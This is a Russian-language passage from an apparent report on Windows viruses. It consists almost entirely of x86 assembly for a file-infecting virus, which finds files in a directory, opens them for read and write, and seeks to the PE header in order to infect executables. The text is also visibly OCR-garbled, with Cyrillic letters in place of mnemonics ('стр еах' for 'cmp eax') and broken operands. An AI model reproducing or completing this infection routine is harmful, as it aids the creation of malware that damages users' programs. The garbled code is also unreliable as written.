Доклад: Вирусы под Windows

; Инициализируем счетчик заражений

mov byte ptr [ebp+offset countinfect],0

;Ищем первый файл
infectdir:

lea eax, [ebp+offset win32_data_thang]

push eax

lea eax, [ebp+offset fname]

push eax

call FindFile

;Сохраним индекс для поиска

mov dword ptr [ebp+offset searchhandle],eax

.Проверим, найден ли файл. Если файл не найден,
.меняем директорию

стр еах,-1

jz foundnothing

[Откроем файл для чтения и записи
gofile:

push О

push dword ptr [ebp+offset fileattr] ;FILE_ATTRIBUTE_NORMAL

push 3 ;OPEN_EXISTING

push 0

push 0

push 80000000h+40000000h ;GENERIC_READ+GENERIC_WRITE

lea eax, [ebp+offset fullname]

push eax

call CreateFile

.Сохраним описатель файла

mov dword ptr [ebp+offset ahandj.eax

Проверим, не произошла ли ошибка.
.Если ошибка произошла, ищем следующий файл

стр еах,-1

jz findnextone

.Поставим указатель позиции чтения/записи на поле
;со смещением РЕ-заголовка